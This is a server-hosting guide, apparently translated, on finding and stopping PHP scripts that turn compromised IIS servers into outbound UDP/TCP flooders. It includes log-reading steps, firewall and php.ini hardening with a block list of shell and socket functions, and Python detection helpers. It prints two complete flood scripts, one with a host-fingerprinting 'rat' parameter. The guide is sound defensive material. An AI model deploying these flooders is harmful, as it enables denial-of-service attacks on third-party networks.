PHP outbound packet flooding crashes the server: the ultimate solution [recommended] (Windows Server)

Source: Internet
Author: User
Tags chmod php class rand strlen server hosting
I. Analysis of PHP outbound packet flooding
A PHP script opens sockets and uses the server's own network connection to attack other IPs directly. The common code is as follows:

<?php
$packets = 0;
$ip = $_GET['ip'];
$rand = $_GET['port'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET['time'];
$time = time();
print "Flooded: $ip on port $rand\n";
$max_time = $time + $exec_time;

for ($i = 0; $i < 65535; $i++) {
    $out .= "X";
}
while (1) {
    $packets++;
    if (time() > $max_time) {
        break;
    }
    $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
    if ($fp) {
        fwrite($fp, $out);
        fclose($fp);
    }
}
echo "Packet complete at " . date('h:i:s') . " with "
    . "$packets (" . round(($packets * 65) / 1024, 2) . " MB) packets averaging "
    . round($packets / $exec_time, 2) . " packets/s \n";
?>

II. Symptoms
As soon as IIS is started, the server's bandwidth is exhausted; that is, the server keeps sending packets to others. This is different from being the target of a DDoS attack, where the server continuously receives a large number of packets.
Recently a DEDECMS vulnerability has caused this problem to appear on a large number of servers.
How do you find these sites quickly?
Open the log file
C:\Windows\System32\LogFiles\HTTPERR\httperr...log (the file for today's date),
and look for a record like this:
2011-04-26 06:37:28 58.255.112.112 26817 98.126.247.13 - HTTP/1.1 445&time=120 503 783 Disabled 30_freehost_1
The last three fields are 783 Disabled 30_freehost_1:
783 is the ID of this site in IIS;
30_freehost_1 is the application pool it belongs to.
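The following Python script is an added example (not from the original article) that automates the check just described: it parses HTTPERR records, counts the 503/Disabled records per IIS site id and application pool (the "last three fields" above), and pulls the flooder's ip/host/port/time parameters out of the request URI so you can see which target your server was hitting. It assumes the standard HTTP.sys HTTPERR field order (date, time, c-ip, c-port, s-ip, s-port, cs-version, cs-method, cs-uri, sc-status, s-siteid, s-reason, s-queuename); the log lines embedded in it are constructed to match the record quoted above, with TEST-NET addresses as the flooded targets.

```python
"""Pick out the IIS site id and application pool from HTTPERR log lines.

Added example, not part of the original article. Assumes the standard
HTTP.sys HTTPERR field order; the sample log below is constructed.
"""
import urllib.parse
from collections import Counter

# Constructed sample log (not real server data), shaped like the record quoted in the article.
SAMPLE_LOG = """\
#Software: Microsoft HTTP API 2.0
#Fields: date time c-ip c-port s-ip s-port cs-version cs-method cs-uri sc-status s-siteid s-reason s-queuename
2011-04-26 06:37:28 58.255.112.112 26817 98.126.247.13 80 HTTP/1.1 GET /x.php?ip=203.0.113.5&port=445&time=120 503 783 Disabled 30_freehost_1
2011-04-26 06:37:29 58.255.112.112 26818 98.126.247.13 80 HTTP/1.1 GET /x.php?ip=203.0.113.5&port=445&time=120 503 783 Disabled 30_freehost_1
2011-04-26 06:40:01 198.51.100.7 40001 98.126.247.13 80 - - - 400 - BadRequest -
2011-04-26 06:41:12 58.255.112.112 26900 98.126.247.13 80 HTTP/1.1 GET /c.php?host=203.0.113.9&port=80&time=69 503 912 Disabled 30_freehost_2
"""

# Query parameters the flooder scripts in the article read from $_GET.
FLOOD_PARAMS = {"ip", "host", "port", "time"}


def parse_httperr_line(line):
    """Split one HTTPERR record into named fields; None for comment, blank or malformed lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) != 13:
        return None
    return {
        "date": parts[0], "time": parts[1], "client_ip": parts[2],
        "uri": parts[8], "status": parts[9], "site_id": parts[10],
        "reason": parts[11], "pool": parts[12],
    }


def disabled_sites(log_text):
    """Count 503/Disabled records per (site id, app pool): the 'last three fields' the article points at."""
    hits = Counter()
    for line in log_text.splitlines():
        rec = parse_httperr_line(line)
        if rec and rec["status"] == "503" and rec["reason"] == "Disabled":
            hits[(rec["site_id"], rec["pool"])] += 1
    return dict(hits)


def flood_requests(log_text):
    """Records whose query string carries the flooder's parameters, with the flooded target pulled out."""
    found = []
    for line in log_text.splitlines():
        rec = parse_httperr_line(line)
        if not rec:
            continue
        query = urllib.parse.urlsplit(rec["uri"]).query
        params = {k.lower(): v for k, v in urllib.parse.parse_qsl(query, keep_blank_values=True)}
        present = sorted(set(params) & FLOOD_PARAMS)
        if len(present) >= 2:  # ip/host plus port (and usually time) is the flooder's signature
            rec["flood_params"] = present
            rec["target"] = params.get("ip") or params.get("host")
            found.append(rec)
    return found


if __name__ == "__main__":
    for (site, pool), n in disabled_sites(SAMPLE_LOG).items():
        print(f"site {site} in pool {pool}: {n} refused requests")
    for rec in flood_requests(SAMPLE_LOG):
        print(f"{rec['client_ip']} requested {rec['uri']} -> flooding {rec['target']}")
```

Run it on a real log with disabled_sites(open(path).read()); the client_ip field tells you who is driving the script, and the target field tells you whose network your server was hitting, which is what any abuse complaint you receive will be about.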

III. Solutions
1. Find this site and stop it, or stop its application pool, and restart IIS.
2. In the IP security policy or the firewall, block all outbound UDP.
The latest security package ships with a version 4.0 IP policy ("Download safe package"); import it directly and it limits outgoing UDP packets. Download the package, then import the security policy. But this policy does not close the DNS port, so some of the attacks still work.
To solve this, you can also adjust the IP policy so that UDP may only reach a specific DNS server IP, such as 8.8.8.8. Unless the attacker happens to target that IP, the attack is ineffective. You can also set the network card's DNS to a DNS IP that only you know and that is not otherwise opened, and then change the UDP "open" rule in the IP policy to allow only it. (Open the properties of the IP policy, double-click the open rule, delete either one of the two UDP records in it, double-click the remaining one, change the address from "any address" to "from source address to destination address: specific IP", set this IP to your own DNS IP, such as 8.8.8.8, and save.)
On 2011-4-27 we uploaded a new security package containing the file "Xingwai (星外) virtual host management platform IP policy to shut down all UDP ports.IPSec"; import and enable it to shut down all UDP ports and prevent such attacks completely. However, because this policy closes the DNS port, the server can no longer use IE to reach any domain name, so users' collection (content-scraping) functions will not work. (Likewise, if this policy is used on the master site, the controlled-host self-test will fail because domain names cannot be resolved, and some users report that this policy causes MySQL to stop working normally.)

3. With the "一流信息监控" (first-class information monitoring) interception system, in SQL interception and website interception, intercept the keyword "port=" (other keywords can be deleted).
4. You can also block the above code directly in php.ini (for example Win\php.ini) and then restart IIS:
ignore_user_abort = On
(Note that the leading ";" must be deleted.)
disable_functions = exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,
Append at the end:
fsockopen,set_time_limit
But this can cause many PHP programs to stop working normally.
Besides, this also shows that your server is otherwise well secured: if the attacker could break in, they would simply take over the server; why would they bother with DoS?
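As an added example (not from the article), the following Python script checks a php.ini for this step: it ignores lines commented out with ";" (the point of the note above about deleting the leading ";"), reports whether ignore_user_abort is active and whether fsockopen, pfsockopen and set_time_limit are in disable_functions, and can append the missing names the way the article says to add them at the end. The php.ini fragment inside it is constructed; the directive names are real php.ini directives and the function list is the article's.

```python
"""Audit a php.ini for the disable_functions hardening step above.

Added example, not from the original article. The php.ini fragment is
constructed; the directive names are real php.ini directives.
"""

# Functions the article says must be on the disable_functions list to stop the flooder.
REQUIRED_DISABLED = {"fsockopen", "pfsockopen", "set_time_limit"}

# Constructed php.ini fragment: ignore_user_abort still commented out, and the
# article's disable_functions line before fsockopen/set_time_limit are appended.
SAMPLE_INI = """\
[PHP]
;ignore_user_abort = On
disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,
"""


def active_directives(ini_text):
    """Directive -> value for live lines (not commented out with ';', not section headers)."""
    directives = {}
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("["):
            continue
        if "=" in line:
            key, value = line.split("=", 1)
            directives[key.strip().lower()] = value.strip()
    return directives


def disabled_functions(ini_text):
    """Set of function names (lower-cased) in the live disable_functions directive."""
    value = active_directives(ini_text).get("disable_functions", "")
    return {f.strip().lower() for f in value.split(",") if f.strip()}


def audit_php_ini(ini_text):
    """Findings that step 4 would require you to fix; an empty list means the step is applied."""
    findings = []
    directives = active_directives(ini_text)
    if directives.get("ignore_user_abort", "").lower() not in ("on", "1", "true"):
        findings.append('ignore_user_abort is not active (the leading ";" must be removed)')
    missing = sorted(REQUIRED_DISABLED - disabled_functions(ini_text))
    if missing:
        findings.append("disable_functions is missing: " + ", ".join(missing))
    return findings


def append_disabled(ini_text, extra):
    """Return ini_text with the names in `extra` appended to the live disable_functions line."""
    out = []
    for raw in ini_text.splitlines():
        stripped = raw.strip()
        if (not stripped.startswith(";") and "=" in raw
                and stripped.lower().startswith("disable_functions")):
            key, value = raw.split("=", 1)
            current = [f.strip() for f in value.split(",") if f.strip()]
            have = {f.lower() for f in current}
            current += [f for f in extra if f.lower() not in have]
            raw = key.strip() + " = " + ",".join(current)
        out.append(raw)
    return "\n".join(out) + "\n"


def enable_directive(ini_text, name):
    """Uncomment a ';name = value' line so the directive takes effect."""
    out = []
    for raw in ini_text.splitlines():
        stripped = raw.strip()
        if stripped.startswith(";") and stripped[1:].strip().lower().startswith(name.lower()):
            raw = stripped[1:].strip()
        out.append(raw)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    print("before:", audit_php_ini(SAMPLE_INI))
    fixed = enable_directive(append_disabled(SAMPLE_INI, ["fsockopen", "set_time_limit"]),
                             "ignore_user_abort")
    print("after:", audit_php_ini(fixed))
```

Point audit_php_ini at the php.ini that the IIS PHP handler actually loads (phpinfo() shows the path), since a correctly edited copy elsewhere changes nothing until IIS is restarted with it.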

Recently a new PHP DDoS script based on TCP attacks has appeared, as follows:

<?php
set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$packets = 64;
ignore_user_abort(True);
if (strlen($host) == 0 or strlen($port) == 0 or strlen($exec_time) == 0) {
    if (strlen($_GET['rat']) <> 0) {
        echo $_GET['rat'] . $_SERVER["HTTP_HOST"] . "|" . gethostbyname($_SERVER['SERVER_NAME']) . "|"
            . php_uname() . "|" . $_SERVER['SERVER_SOFTWARE'] . $_GET['rat'];
        exit;
    }
    exit;
}
$max_time = time() + $exec_time;
while (1) {
    $packets++;
    if (time() > $max_time or $exec_time != 69) {
        break;
    }
    $fp = fsockopen("tcp://$host", $port, $errno, $errstr, 0);
}
?>

The same kind of solutions can be adopted:
1. Block the above code directly in php.ini (for example Win\php.ini) and then restart IIS:
ignore_user_abort = On
(Note that the leading ";" must be deleted.)
disable_functions = exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,
Append at the end:
fsockopen,set_time_limit
But this can cause many PHP programs to stop working normally.
2. Block all outbound TCP packets in the IP policy, but this makes collection functions fail and cannot be used on the master server.
3. On the server, search all PHP class files for the keywords "tcp:" or "udp:", find the attack file, and delete it.
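Step 3's keyword search for "tcp:" or "udp:" also matches legitimate code, such as mail or API clients that open a fixed host. The following Python scanner is an added example (not from the article): it walks a web root and, rather than a bare keyword match, flags files that combine a socket URL, fsockopen/pfsockopen, a host taken from $_GET/$_POST/$_REQUEST, and one of set_time_limit(0)/ignore_user_abort/while(1), which is the shape shared by both scripts shown in this article. The indicator set is my assumption; the PHP snippets inside it are constructed samples, and the flooder-like one is deliberately not working code.

```python
"""Scan a web root for PHP files that look like the outbound flooder scripts above.

Added example, not from the original article. The indicator patterns are an
assumption about what such scripts have in common; the PHP snippets are
constructed samples.
"""
import os
import re
import tempfile

INDICATORS = {
    "socket_scheme": re.compile(r"\b(udp|tcp)://", re.I),
    "fsockopen": re.compile(r"\bp?fsockopen\s*\(", re.I),
    "request_input": re.compile(r"\$_(GET|POST|REQUEST)\s*\["),
    "no_time_limit": re.compile(r"\bset_time_limit\s*\(\s*(0|\d{4,})\s*\)", re.I),
    "ignore_abort": re.compile(r"\bignore_user_abort\s*\(", re.I),
    "infinite_loop": re.compile(r"\bwhile\s*\(\s*(1|true)\s*\)", re.I),
}

# Constructed sample 1: carries the flooder's indicators; the loop body is only a comment.
FLOODER_LIKE = """<?php
$ip = $_GET['ip']; $port = $_GET['port'];
set_time_limit(0); ignore_user_abort(true);
while (1) {
    // ... fsockopen("udp://$ip", $port, ...) and fwrite() would sit here ...
}
"""

# Constructed sample 2: a legitimate SMTP client. A bare grep for "tcp:" flags it too.
MAIL_CLIENT = """<?php
$smtp = fsockopen("tcp://mail.example.com", 25, $errno, $errstr, 10);
fwrite($smtp, "EHLO example.com\\r\\n");
"""

# Constructed sample 3: nothing of interest.
PLAIN_PAGE = "<?php echo 'hello'; ?>"


def scan_source(text):
    """Which indicators a PHP source contains, and whether the combination looks like a flooder."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    # Socket use towards a request-supplied host, kept alive past the client's
    # disconnect or for a long time, is the shape of both scripts in the article.
    likely = ({"socket_scheme", "fsockopen", "request_input"} <= set(hits)
              and bool({"no_time_limit", "ignore_abort", "infinite_loop"} & set(hits)))
    return {"indicators": hits, "likely_flooder": likely}


def scan_tree(root):
    """Scan every PHP-like file under root; return {path: result} for files with any indicator."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".php", ".inc", ".phtml")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    result = scan_source(fh.read())
                if result["indicators"]:
                    results[path] = result
    return results


def demo():
    """Write the constructed samples into a temporary web root and scan it; keyed by file name."""
    with tempfile.TemporaryDirectory() as root:
        samples = (("flooder.php", FLOODER_LIKE), ("mail.php", MAIL_CLIENT), ("index.php", PLAIN_PAGE))
        for name, body in samples:
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return {os.path.basename(p): r for p, r in scan_tree(root).items()}


if __name__ == "__main__":
    for name, result in demo().items():
        flag = "LIKELY FLOODER" if result["likely_flooder"] else "review"
        print(f"{name}: {flag} {result['indicators']}")
```

Files reported as "review" (socket use without request-supplied targets) are the false positives the plain keyword search would have deleted; check them by hand before removing anything, and remember that a scanner only finds what is on disk, so the php.ini and IP policy steps above are still what stops a script you have not found yet.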

The above methods are for VPS and server hosting users to learn from!
